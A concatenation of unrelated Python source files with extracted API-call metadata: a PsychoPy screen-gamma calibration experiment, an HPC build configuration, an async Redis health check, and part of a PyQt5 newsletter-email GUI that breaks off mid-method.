zcoord)\n', (17079, 17093), False, 'import openmoc\n'), ((21976, 22009), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (21995, 22009), False, 'import openmoc\n'), ((22310, 22327), 'numpy.isnan', 'np.isnan', (['cell_id'], {}), '(cell_id)\n', (22318, 22327), True, 'import numpy as np\n'), ((26665, 26698), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (26684, 26698), False, 'import openmoc\n'), ((26929, 26945), 'numpy.isnan', 'np.isnan', (['fsr_id'], {}), '(fsr_id)\n', (26937, 26945), True, 'import numpy as np\n'), ((27353, 27383), 'numpy.flipud', 'np.flipud', (['fluxes[index, :, :]'], {}), '(fluxes[index, :, :])\n', (27362, 27383), True, 'import numpy as np\n'), ((31250, 31289), 'numpy.arange', 'np.arange', (['(num_groups + 1)'], {'dtype': 'np.int'}), '(num_groups + 1, dtype=np.int)\n', (31259, 31289), True, 'import numpy as np\n'), ((32096, 32125), 'numpy.sum', 'np.sum', (['(group_deltas * fluxes)'], {}), '(group_deltas * fluxes)\n', (32102, 32125), True, 'import numpy as np\n'), ((35390, 35423), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (35409, 35423), False, 'import openmoc\n'), ((35654, 35670), 'numpy.isnan', 'np.isnan', (['fsr_id'], {}), '(fsr_id)\n', (35662, 35670), True, 'import numpy as np\n'), ((37693, 37732), 'numpy.arange', 'np.arange', (['(1)', '(iramsolver._num_modes + 1)'], {}), '(1, iramsolver._num_modes + 1)\n', (37702, 37732), True, 'import numpy as np\n'), ((38913, 38943), 'numpy.ascontiguousarray', 'np.ascontiguousarray', (['eigenvec'], {}), '(eigenvec)\n', (38933, 38943), True, 'import numpy as np\n'), ((39096, 39112), 'numpy.abs', 'np.abs', (['eigenvec'], {}), '(eigenvec)\n', (39102, 39112), True, 'import numpy as np\n'), ((32367, 32485), 'matplotlib.pyplot.loglog', 'plt.loglog', (['group_bounds[group:group + 2]', '([fluxes[group]] * 2)'], {'linewidth': '(3)', 'c': '"""b"""', 'label': '"""openmoc"""', 'linestyle': '"""-"""'}), "(group_bounds[group:group + 2], [fluxes[group]] * 2, linewidth=3,\n c='b', label='openmoc', linestyle='-')\n", (32377, 32485), True, 'import matplotlib.pyplot as plt\n'), ((32518, 32635), 'matplotlib.pyplot.plot', 'plt.plot', (['group_bounds[group:group + 2]', '([fluxes[group]] * 2)'], {'linewidth': '(3)', 'c': '"""b"""', 'label': '"""openmoc"""', 'linestyle': '"""-"""'}), "(group_bounds[group:group + 2], [fluxes[group]] * 2, linewidth=3, c\n ='b', label='openmoc', linestyle='-')\n", (32526, 32635), True, 'import matplotlib.pyplot as plt\n'), ((38960, 38977), 'numpy.real', 'np.real', (['eigenvec'], {}), '(eigenvec)\n', (38967, 38977), True, 'import numpy as np\n'), ((15749, 15781), 'matplotlib.markers.MarkerStyle', 'matplotlib.markers.MarkerStyle', ([], {}), '()\n', (15779, 15781), False, 'import matplotlib\n'), ((32731, 32824), 'matplotlib.pyplot.loglog', 'plt.loglog', (['([group_bounds[group + 1]] * 2)', 'fluxes[group:group + 2]'], {'c': '"""b"""', 'linestyle': '"""--"""'}), "([group_bounds[group + 1]] * 2, fluxes[group:group + 2], c='b',\n linestyle='--')\n", (32741, 32824), True, 'import matplotlib.pyplot as plt\n'), ((32861, 32952), 'matplotlib.pyplot.plot', 'plt.plot', (['([group_bounds[group + 1]] * 2)', 'fluxes[group:group + 2]'], {'c': '"""b"""', 'linestyle': '"""--"""'}), "([group_bounds[group + 1]] * 2, fluxes[group:group + 2], c='b',\n linestyle='--')\n", (32869, 32952), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Determine screen gamma using motion-nulling method
of <NAME> Smith, 1994, Vision Research, 34, 2727-2740
A similar system had been used early for chromatic isoluminance:
Anstis SM, <NAME>. A minimum motion technique for judging equiluminance.
In: Sharpe MJD & LT Colour vision: Psychophysics and physiology. London: Academic Press; 1983. pp. 66-77.
Instructions: on each trial press the up/down cursor keys depending on
the apparent direction of motion of the bars.
"""
from __future__ import absolute_import, division, print_function
from builtins import next
from builtins import range
from psychopy import visual, core, event, gui, data
from psychopy.tools.filetools import fromFile, toFile
from psychopy.visual import filters
import numpy as num
import time
try:
# try to load previous info
info = fromFile('info_gamma.pickle')
print(info)
except Exception:
# if no file use some defaults
info = {}
info['lumModNoise'] = 0.5
info['lumModLum'] = 0.1
info['contrastModNoise'] = 1.0
info['observer'] = ''
info['highGamma'] = 3.0
info['lowGamma'] = 0.8
info['nTrials'] = 50
dlg = gui.DlgFromDict(info)
# save to a file for future use (ie storing as defaults)
if dlg.OK:
toFile('info_gamma.pickle', info)
else:
core.quit() # user cancelled. quit
print(info)
info['timeStr']=time.strftime("%b_%d_%H%M", time.localtime())
nFrames = 3
cyclesTime = 2
cyclesSpace = 2
pixels = 128
win = visual.Window((1024, 768), units='pix', allowGUI=True, bitsMode=None)
visual.TextStim(win, text='building stimuli').draw()
win.flip()
globalClock = core.Clock()
# for luminance modulated noise
noiseMatrix = num.random.randint(0, 2, [pixels, pixels]) # * noiseContrast
noiseMatrix = noiseMatrix * 2.0-1 # into range -1: 1
stimFrames = []; lumGratings=[]
# create the 4 frames of the sequence (luminance and contrast modulated noise in quadrature)
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=0))
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0 / pixels, ori=90,
tex= (noiseMatrix * info['lumModNoise'] + lumGratings[0] * info['lumModLum'])
))
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=90) / 2.0 + 0.5)
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0/pixels, ori=90,
tex= (noiseMatrix * info['contrastModNoise'] * lumGratings[1])
))
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=180))
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0/pixels, ori=90,
tex= (noiseMatrix * info['lumModNoise'] + lumGratings[2] * info['lumModLum'])
))
lumGratings.append(filters.makeGrating(pixels, 0, cyclesSpace, phase=270) / 2.0 + 0.5)
stimFrames.append(visual.GratingStim(win, texRes=pixels, mask='circle',
size=pixels * 2, sf=1.0/pixels, ori=90,
tex= (noiseMatrix * info['contrastModNoise'] * lumGratings[3])
))
stairCases = []
# two staircases - one from the top, one from below - to average
stairCases.append(data.StairHandler(startVal=info['highGamma'], nTrials=info['nTrials'],
stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',
nUp=1, nDown=1))
stairCases.append(data.StairHandler(startVal=info['lowGamma'], nTrials=info['nTrials'],
stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',
nUp=1, nDown=1))
def getResponse(direction):
"""if subject said up when direction was up ( + 1) then increase gamma
Otherwise, decrease gamma"""
event.clearEvents() # clear the event buffer to start with
while 1: # forever until we return
for key in event.getKeys():
# quit
if key in ['escape', 'q']:
win.close()
# win.bits.reset()
core.quit()
# valid response - check to see if correct
elif key in ['down', 'up']:
if ((key in ['down'] and direction == -1) or
(key in ['up'] and direction == +1)):
return 0
else:
return 1
else:
print("hit DOWN or UP (or Esc) (You hit %s)" %key)
def presentStimulus(direction):
"""Present stimulus drifting in a given direction (for low gamma)
where:
direction = + 1(up) or -1(down)
"""
win.fps()
startPhase = num.random.random()
if direction == 1:
frameIndices = num.arange(0, 4)
else:
frameIndices = num.arange(3, -1, -1)
for cycles in range(cyclesTime):
# cycle through the 4 frames
for ii in frameIndices:
thisStim = stimFrames[ii]
thisStim.setPhase(startPhase)
for n in range(nFrames):
# present for several constant frames (TF)
thisStim.draw()
win.flip()
# then blank the screen
win.flip()
# run the staircase
for trialN in range(info['nTrials']):
for stairCase in stairCases:
thisGamma = next(stairCase)
t = globalClock.getTime()
win.gamma = [thisGamma, thisGamma, thisGamma]
direction = num.random.randint(0, 2) * 2-1 # a random number -1 or 1
presentStimulus(direction)
ans = getResponse(direction)
stairCase.addData(ans)
win.flip()
core.wait(0.5)
win.close()
# save data
fileName = gui.fileSaveDlg('.', '%s_%s' %(info['observer'], info['timeStr']))
stairCases[1].saveAsPickle(fileName + 'hi')
stairCases[1].saveAsText(fileName + 'hi')
stairCases[0].saveAsPickle(fileName + 'lo')
stairCases[0].saveAsText(fileName + 'lo')
print('That took %.1fmins' % (globalClock.getTime() / 60.0))
core.quit()
# The contents of this file are in the public domain.
|
[
"numpy.random.randint",
"numpy.arange",
"psychopy.tools.filetools.toFile",
"psychopy.event.clearEvents",
"psychopy.gui.DlgFromDict",
"builtins.range",
"psychopy.event.getKeys",
"psychopy.tools.filetools.fromFile",
"builtins.next",
"psychopy.visual.Window",
"psychopy.core.quit",
"time.localtime",
"psychopy.data.StairHandler",
"psychopy.gui.fileSaveDlg",
"psychopy.core.Clock",
"psychopy.core.wait",
"psychopy.visual.TextStim",
"psychopy.visual.GratingStim",
"numpy.random.random",
"psychopy.visual.filters.makeGrating"
] |
[((1183, 1204), 'psychopy.gui.DlgFromDict', 'gui.DlgFromDict', (['info'], {}), '(info)\n', (1198, 1204), False, 'from psychopy import visual, core, event, gui, data\n'), ((1495, 1564), 'psychopy.visual.Window', 'visual.Window', (['(1024, 768)'], {'units': '"""pix"""', 'allowGUI': '(True)', 'bitsMode': 'None'}), "((1024, 768), units='pix', allowGUI=True, bitsMode=None)\n", (1508, 1564), False, 'from psychopy import visual, core, event, gui, data\n'), ((1645, 1657), 'psychopy.core.Clock', 'core.Clock', ([], {}), '()\n', (1655, 1657), False, 'from psychopy import visual, core, event, gui, data\n'), ((1705, 1747), 'numpy.random.randint', 'num.random.randint', (['(0)', '(2)', '[pixels, pixels]'], {}), '(0, 2, [pixels, pixels])\n', (1723, 1747), True, 'import numpy as num\n'), ((5136, 5158), 'builtins.range', 'range', (["info['nTrials']"], {}), "(info['nTrials'])\n", (5141, 5158), False, 'from builtins import range\n'), ((5512, 5526), 'psychopy.core.wait', 'core.wait', (['(0.5)'], {}), '(0.5)\n', (5521, 5526), False, 'from psychopy import visual, core, event, gui, data\n'), ((5564, 5631), 'psychopy.gui.fileSaveDlg', 'gui.fileSaveDlg', (['"""."""', "('%s_%s' % (info['observer'], info['timeStr']))"], {}), "('.', '%s_%s' % (info['observer'], info['timeStr']))\n", (5579, 5631), False, 'from psychopy import visual, core, event, gui, data\n'), ((5866, 5877), 'psychopy.core.quit', 'core.quit', ([], {}), '()\n', (5875, 5877), False, 'from psychopy import visual, core, event, gui, data\n'), ((865, 894), 'psychopy.tools.filetools.fromFile', 'fromFile', (['"""info_gamma.pickle"""'], {}), "('info_gamma.pickle')\n", (873, 894), False, 'from psychopy.tools.filetools import fromFile, toFile\n'), ((1277, 1310), 'psychopy.tools.filetools.toFile', 'toFile', (['"""info_gamma.pickle"""', 'info'], {}), "('info_gamma.pickle', info)\n", (1283, 1310), False, 'from psychopy.tools.filetools import fromFile, toFile\n'), ((1321, 1332), 'psychopy.core.quit', 'core.quit', ([], {}), '()\n', (1330, 1332), False, 'from psychopy import visual, core, event, gui, data\n'), ((1414, 1430), 'time.localtime', 'time.localtime', ([], {}), '()\n', (1428, 1430), False, 'import time\n'), ((1966, 2018), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(0)'}), '(pixels, 0, cyclesSpace, phase=0)\n', (1985, 2018), False, 'from psychopy.visual import filters\n'), ((2038, 2219), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['lumModNoise'] + lumGratings[0] * info['lumModLum'])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['lumModNoise'] + \n lumGratings[0] * info['lumModLum'])\n", (2056, 2219), False, 'from psychopy import visual, core, event, gui, data\n'), ((2343, 2508), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['contrastModNoise'] * lumGratings[1])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['contrastModNoise'] *\n lumGratings[1])\n", (2361, 2508), False, 'from psychopy import visual, core, event, gui, data\n'), ((2546, 2600), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(180)'}), '(pixels, 0, cyclesSpace, phase=180)\n', (2565, 2600), False, 'from psychopy.visual import filters\n'), ((2620, 2801), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['lumModNoise'] + lumGratings[2] * info['lumModLum'])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['lumModNoise'] + \n lumGratings[2] * info['lumModLum'])\n", (2638, 2801), False, 'from psychopy import visual, core, event, gui, data\n'), ((2924, 3089), 'psychopy.visual.GratingStim', 'visual.GratingStim', (['win'], {'texRes': 'pixels', 'mask': '"""circle"""', 'size': '(pixels * 2)', 'sf': '(1.0 / pixels)', 'ori': '(90)', 'tex': "(noiseMatrix * info['contrastModNoise'] * lumGratings[3])"}), "(win, texRes=pixels, mask='circle', size=pixels * 2, sf=\n 1.0 / pixels, ori=90, tex=noiseMatrix * info['contrastModNoise'] *\n lumGratings[3])\n", (2942, 3089), False, 'from psychopy import visual, core, event, gui, data\n'), ((3208, 3372), 'psychopy.data.StairHandler', 'data.StairHandler', ([], {'startVal': "info['highGamma']", 'nTrials': "info['nTrials']", 'stepSizes': '[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05]', 'stepType': '"""lin"""', 'nUp': '(1)', 'nDown': '(1)'}), "(startVal=info['highGamma'], nTrials=info['nTrials'],\n stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',\n nUp=1, nDown=1)\n", (3225, 3372), False, 'from psychopy import visual, core, event, gui, data\n'), ((3400, 3563), 'psychopy.data.StairHandler', 'data.StairHandler', ([], {'startVal': "info['lowGamma']", 'nTrials': "info['nTrials']", 'stepSizes': '[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05]', 'stepType': '"""lin"""', 'nUp': '(1)', 'nDown': '(1)'}), "(startVal=info['lowGamma'], nTrials=info['nTrials'],\n stepSizes=[0.5, 0.5, 0.1, 0.1, 0.1, 0.1, 0.05, 0.05], stepType='lin',\n nUp=1, nDown=1)\n", (3417, 3563), False, 'from psychopy import visual, core, event, gui, data\n'), ((3714, 3733), 'psychopy.event.clearEvents', 'event.clearEvents', ([], {}), '()\n', (3731, 3733), False, 'from psychopy import visual, core, event, gui, data\n'), ((4577, 4596), 'numpy.random.random', 'num.random.random', ([], {}), '()\n', (4594, 4596), True, 'import numpy as num\n'), ((4734, 4751), 'builtins.range', 'range', (['cyclesTime'], {}), '(cyclesTime)\n', (4739, 4751), False, 'from builtins import range\n'), ((1565, 1610), 'psychopy.visual.TextStim', 'visual.TextStim', (['win'], {'text': '"""building stimuli"""'}), "(win, text='building stimuli')\n", (1580, 1610), False, 'from psychopy import visual, core, event, gui, data\n'), ((3834, 3849), 'psychopy.event.getKeys', 'event.getKeys', ([], {}), '()\n', (3847, 3849), False, 'from psychopy import visual, core, event, gui, data\n'), ((4643, 4659), 'numpy.arange', 'num.arange', (['(0)', '(4)'], {}), '(0, 4)\n', (4653, 4659), True, 'import numpy as num\n'), ((4693, 4714), 'numpy.arange', 'num.arange', (['(3)', '(-1)', '(-1)'], {}), '(3, -1, -1)\n', (4703, 4714), True, 'import numpy as num\n'), ((5213, 5228), 'builtins.next', 'next', (['stairCase'], {}), '(stairCase)\n', (5217, 5228), False, 'from builtins import next\n'), ((2258, 2311), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(90)'}), '(pixels, 0, cyclesSpace, phase=90)\n', (2277, 2311), False, 'from psychopy.visual import filters\n'), ((2838, 2892), 'psychopy.visual.filters.makeGrating', 'filters.makeGrating', (['pixels', '(0)', 'cyclesSpace'], {'phase': '(270)'}), '(pixels, 0, cyclesSpace, phase=270)\n', (2857, 2892), False, 'from psychopy.visual import filters\n'), ((4923, 4937), 'builtins.range', 'range', (['nFrames'], {}), '(nFrames)\n', (4928, 4937), False, 'from builtins import range\n'), ((3988, 3999), 'psychopy.core.quit', 'core.quit', ([], {}), '()\n', (3997, 3999), False, 'from psychopy import visual, core, event, gui, data\n'), ((5338, 5362), 'numpy.random.randint', 'num.random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (5356, 5362), True, 'import numpy as num\n')]
|
################################################################################
# #
# MACHINE-SPECIFIC FUNCTIONS #
# #
# OPTIONS: #
# COMPILER : PATH TO COMPILER EXECUTABLE #
# GSL_DIR : PATH TO GSL INSTALLATION #
# MPI_DIR : PATH TO MPI INSTALLATION #
# HDF5_DIR : PATH TO HDF5 INSTALLATION #
# EXECUTABLE : BINARY WRAPPER USED TO LAUNCH BHLIGHT #
# #
# MPI_DIR AND HDF5_DIR ARE NOT REQUIRED IF COMPILER HANDLES HEADERS AND #
# LIBRARIES FOR THESE DEPENDENCIES #
# #
################################################################################
import util
import sys
import os
# module purge
# module load gcc
# module load openmpi
# module load hdf5-parallel
# module load python
flags_base = '-Wall -Werror -fdiagnostics-color -fopenmp'
fcflags = '-lmpi_usempif08 -lmpi_usempi_ignore_tkr -lmpi_mpifh'
fflags_base = '-fdiagnostics-color -fopenmp -cpp'
def matches_host():
import re
host = os.uname()[1]
my_host = re.compile(r'ba\d+')
return bool(my_host.match(host))
def get_options():
host = {}
host['NAME'] = os.uname()[1]
host['COMPILER'] = 'h5pcc'
#host['COMPILER'] = '/usr/local/hdf5-parallel/bin/h5pcc'
host['COMPILER_FLAGS'] = flags_base + ' ' + fcflags + ' ' + '-O2 -march=native'
host['DEBUG_FLAGS'] = flags_base + ' ' + fcflags + ' ' + '-g -O0'
# or system GSL if it exists
host['GSL_DIR'] = os.path.join(os.environ['HOME'],'local-gnu-openmpi')
host['FORTRAN_COMP'] = 'h5pfc'
#host['FORTRAN_COMP'] = '/usr/local/hdf5-parallel/bin/h5pfc'
host['FCFLAGS'] = fflags_base + ' ' + '-O2'
host['FDEBUG_FLAGS'] = fflags_base + ' ' + '-g -O0'
host['FORTLINK'] = '-lgfortran -lhdf5_fortran'
host['FORTLIB'] = ''
host['EXECUTABLE'] = 'mpirun'
return host
|
[
"os.uname",
"os.path.join",
"re.compile"
] |
[((1595, 1615), 're.compile', 're.compile', (['"""ba\\\\d+"""'], {}), "('ba\\\\d+')\n", (1605, 1615), False, 'import re\n'), ((2036, 2089), 'os.path.join', 'os.path.join', (["os.environ['HOME']", '"""local-gnu-openmpi"""'], {}), "(os.environ['HOME'], 'local-gnu-openmpi')\n", (2048, 2089), False, 'import os\n'), ((1569, 1579), 'os.uname', 'os.uname', ([], {}), '()\n', (1577, 1579), False, 'import os\n'), ((1711, 1721), 'os.uname', 'os.uname', ([], {}), '()\n', (1719, 1721), False, 'import os\n')]
|
import logging
from typing import AsyncGenerator
from aioredis import ConnectionError
from aioredis import RedisError
from app.db.redis import redis
async def get_redis() -> AsyncGenerator:
try:
await redis.set("health_check", "OK")
yield redis
except ConnectionError as e:
logging.error(f"connection to redis failed: {e}")
finally:
try:
await redis.close()
except RedisError as e:
logging.error(f"closing connection to redis failed: {e}")
|
[
"app.db.redis.redis.set",
"logging.error",
"app.db.redis.redis.close"
] |
[((217, 248), 'app.db.redis.redis.set', 'redis.set', (['"""health_check"""', '"""OK"""'], {}), "('health_check', 'OK')\n", (226, 248), False, 'from app.db.redis import redis\n'), ((310, 359), 'logging.error', 'logging.error', (['f"""connection to redis failed: {e}"""'], {}), "(f'connection to redis failed: {e}')\n", (323, 359), False, 'import logging\n'), ((404, 417), 'app.db.redis.redis.close', 'redis.close', ([], {}), '()\n', (415, 417), False, 'from app.db.redis import redis\n'), ((462, 519), 'logging.error', 'logging.error', (['f"""closing connection to redis failed: {e}"""'], {}), "(f'closing connection to redis failed: {e}')\n", (475, 519), False, 'import logging\n')]
|
import os, sys, titlecase, datetime, json, re, urllib, time, glob
import pathos.multiprocessing as multiprocessing
from email.utils import formataddr
from bs4 import BeautifulSoup
from itertools import chain
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
#
from howdy import resourceDir
from howdy.core import core, QDialogWithPrinting, check_valid_RST, convert_string_RST, HtmlView
from howdy.email import email, email_basegui, emailAddress, emailName, get_email_contacts_dict, get_email_service
from howdy.email.email_mygui import HowdyGuestEmailTV
#from howdy.email.email_demo_gui import HowdyEmailDemoGUI
class HowdyEmailGUI( QDialogWithPrinting ):
class EmailSendDialogDelegate( QItemDelegate ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogDelegate, self ).__init__( )
assert( isinstance( model, HowdyEmailGUI.EmailSendDialogTableModel ) )
self.model = model
def createEditor( self, parent, option, index ):
index_unproxy = index.model( ).mapToSource( index )
row = index_unproxy.row( )
col = index_unproxy.column( )
if col == 0:
cb = QCheckBox( self )
cb.setChecked( self.model.should_email[ row ] )
return cb
elif index.column( ) == 1:
return QLabel( self.model.emails_full[ row ] )
def setEditorData( self, editor, index ):
index_unproxy = index.model( ).mapToSource( index )
row = index_unproxy.row( )
col = index_unproxy.column( )
if col == 0: # is a QCheckBox
editor.setChecked( self.model.should_email[ row ] )
def editorEvent( self, event, model, option, index ):
index_unproxy = model.mapToSource( index )
row = index_unproxy.row( )
col = index_unproxy.column( )
if event.type( ) == QEvent.MouseButtonPress and col == 0:
is_email = self.model.should_email[ row ]
self.model.setData( index_unproxy, not is_email, Qt.CheckStateRole )
event.accept( )
return True
return False
#
## dont-understand-code here: https://stackoverflow.com/a/59230434/3362358
class EmailSendDialogBooleanDelegate( QItemDelegate ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogBooleanDelegate, self ).__init__( )
assert( isinstance( model, HowdyEmailGUI.EmailSendDialogTableModel ) )
self.model = model
def paint(self, painter, option, index):
# Depends on how the data function of your table model is implemented
# 'value' should receive a bool indicate if the checked value.
value = index.data( Qt.CheckStateRole )
self.drawCheck(painter, option, option.rect, value)
self.drawFocus(painter, option, option.rect)
def editorEvent(self, event, model, option, index):
if event.type() == QEvent.MouseButtonRelease:
value = model.data(index, Qt.CheckStateRole )
model.setData(index, not value, Qt.CheckStateRole )
event.accept( )
return True
return False
class EmailSendDialogQSortFilterModel( QSortFilterProxyModel ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogQSortFilterModel, self ).__init__( )
self.setSourceModel( model )
model.emitFilterChanged.connect( self.invalidateFilter )
def filterAcceptsRow( self, rowNumber, sourceParent ):
return self.sourceModel( ).filterRow( rowNumber )
class EmailSendDialogTableModel( QAbstractTableModel ):
_headers = [ 'SEND?', 'EMAIL' ]
statusSignal = pyqtSignal( str )
emitFilterChanged = pyqtSignal( )
def __init__( self, emails_array, verify = True ):
super( HowdyEmailGUI.EmailSendDialogTableModel, self ).__init__( )
self.verify = verify
self.emails_array = [ ]
self.emails_full = [ ]
self.should_email = [ ]
self.setEmails( emails_array )
#
##
self.selectTestButton = QPushButton( 'TEST ADDRESS' )
self.selectAllButton = QPushButton( 'ALL ADDRESSES' )
self.sendEmailButton = QPushButton( 'SEND EMAIL' )
self.selectTestButton.clicked.connect( self.selectTest )
self.selectAllButton.clicked.connect( self.selectAll )
self.sendEmailButton.clicked.connect( self.sendEmail )
#
## now other members #2: the "show all emails" and "show selected emails"
self.showAllEmailsButton = QRadioButton( 'ALL EMAILS' )
self.showSelectedEmailsButton = QRadioButton( 'SELECTED EMAILS' )
buttonGroup = QButtonGroup( )
buttonGroup.addButton( self.showAllEmailsButton )
buttonGroup.addButton( self.showSelectedEmailsButton )
self.showAllEmailsButton.toggle( )
self.showAllEmailsButton.clicked.connect( self.setFilterShowWhichEmails )
self.showSelectedEmailsButton.clicked.connect( self.setFilterShowWhichEmails )
#
## now other members #3: the QLineEdit doing a regex on filter on names OR emails
self.filterOnNamesOrEmails = QLineEdit( '' )
self.filterRegExp = QRegExp( '.', Qt.CaseInsensitive, QRegExp.RegExp )
self.filterOnNamesOrEmails.textChanged.connect( self.setFilterString )
self.showingEmailsLabel = QLabel( '' )
self.emitFilterChanged.connect( self.showNumberFilterEmails )
self.showNumberFilterEmails( )
def setEmails( self, emails_array ):
def get_email( input_tuple ):
name, email = input_tuple
if name is not None:
name = name.replace('"', '').strip( )
return formataddr((name, email))
return email
self.layoutAboutToBeChanged.emit( )
self.emails_array = emails_array.copy( )
self.emails_full = list(map(get_email, emails_array ) )
self.should_email = [ False ] * len( self.emails_full )
self.should_email[ 0 ] = True
self.layoutChanged.emit( )
self.emitFilterChanged.emit( )
def selectTest( self ):
self.layoutAboutToBeChanged.emit( )
for idx in range( len( self.should_email ) ):
self.should_email[ idx ] = False
self.should_email[ 0 ] = True
self.layoutChanged.emit( )
def selectAll( self ):
self.layoutAboutToBeChanged.emit( )
for idx in range(len( self.should_email ) ):
self.should_email[ idx ] = True
self.layoutChanged.emit( )
def sendEmail( self ):
#
## choose which emails to send
input_tuples = list(map(lambda tup: tup[1], filter(
lambda tup: tup[0] == True,
zip( self.should_email, self.emails_array ) ) ) )
if len( input_tuples ) == 0:
self.statusSignal.emit( 'SENT NO EMAILS.' )
return
#
## now send the emails
time0 = time.time( )
self.statusSignal.emit( 'STARTING TO SEND EMAILS...' )
email_service = get_email_service( verify = self.verify )
mydate = datetime.datetime.now( ).date( )
def _send_email_perproc( input_tuple ):
name, fullEmail = input_tuple
subject = titlecase.titlecase(
'Plex Email Newsletter For %s' % mydate.strftime( '%B %Y' ) )
email.send_individual_email_full(
self.mainHtml, subject, fullEmail, name = name,
email_service = email_service )
return True
with multiprocessing.Pool( processes = min(
multiprocessing.cpu_count( ), len( input_tuples ) ) ) as pool:
arrs = list( map( _send_email_perproc, input_tuples ) )
self.statusSignal.emit(
'SENT %d EMAILS IN %0.3f SECONDS.' %
( len( input_tuples ), time.time() - time0 ) )
#
## if I have sent out ALL EMAILS, then I mean to update the newsletter
if all(self.should_email): core.set_date_newsletter( )
def columnCount( self, parent ):
return 2
def rowCount( self, parent ):
return len( self.emails_full )
def headerData( self, col, orientation, role ):
if orientation == Qt.Horizontal and role == Qt.DisplayRole:
return 'EMAIL'
def flags( self, index ):
if index.column( ) == 0:
return Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsSelectable
else: return Qt.ItemIsEnabled | Qt.ItemIsSelectable
def data( self, index, role ):
if not index.isValid( ): return None
row = index.row( )
col = index.column( )
if role == Qt.DisplayRole and col == 1:
return self.emails_full[ row ]
elif role == Qt.CheckStateRole and col == 0:
return self.should_email[ row ]
def setData( self, index, val, role ):
if not index.isValid( ): return False
row = index.row( )
col = index.column( )
if col == 1: return False
if role != Qt.CheckStateRole: return False
self.should_email[ row ] = val
return True
def filterRow( self, rowNumber ):
assert( rowNumber >= 0 )
assert( rowNumber < len( self.emails_full ) )
name, email = self.emails_array[ rowNumber ]
#
## if not one of selected emails and ONLY show selected emails...
if not self.showAllEmailsButton.isChecked( ) and not self.should_email[ rowNumber ]: return False
if self.filterRegExp.indexIn( name ) != -1: return True
if self.filterRegExp.indexIn( email ) != -1: return True
return False
def showNumberFilterEmails( self ):
num_emails = len(list(filter(self.filterRow, range(len(self.emails_full)))))
self.showingEmailsLabel.setText('SHOWING %d EMAILS' % num_emails )
def setFilterString( self, newString ):
mytext = newString.strip( )
if len( mytext ) == 0: mytext = '.'
self.filterRegExp = QRegExp( mytext, Qt.CaseInsensitive, QRegExp.RegExp )
self.emitFilterChanged.emit( )
def setFilterShowWhichEmails( self ):
self.emitFilterChanged.emit( )
class EmailSendDialogTableView( QTableView ):
def __init__( self, model ):
super( HowdyEmailGUI.EmailSendDialogTableView, self ).__init__( )
proxyModel = HowdyEmailGUI.EmailSendDialogQSortFilterModel( model )
self.setModel( proxyModel )
self.setItemDelegateForColumn(
0, HowdyEmailGUI.EmailSendDialogBooleanDelegate( model ) )
#
self.setShowGrid( True )
self.verticalHeader( ).setSectionResizeMode( QHeaderView.Fixed )
self.horizontalHeader( ).setSectionResizeMode( QHeaderView.Fixed )
self.setSelectionBehavior( QAbstractItemView.SelectRows )
self.setSelectionMode( QAbstractItemView.SingleSelection )
self.setSortingEnabled( True )
#
self.setColumnWidth( 0, 180 )
self.setColumnWidth( 1, 180 )
#
toBotAction = QAction( self )
toBotAction.setShortcut( 'End' )
toBotAction.triggered.connect( self.scrollToBottom )
self.addAction( toBotAction )
#
toTopAction = QAction( self )
toTopAction.setShortcut( 'Home' )
toTopAction.triggered.connect( self.scrollToTop )
self.addAction( toTopAction )
def getValidIndexRow( self ):
index_valid = max(
filter(
lambda index: index.column( ) == 0,
self.selectionModel( ).selectedIndexes( ) ) )
return index_valid.row( )
def resizeTableColumns( self, width ):
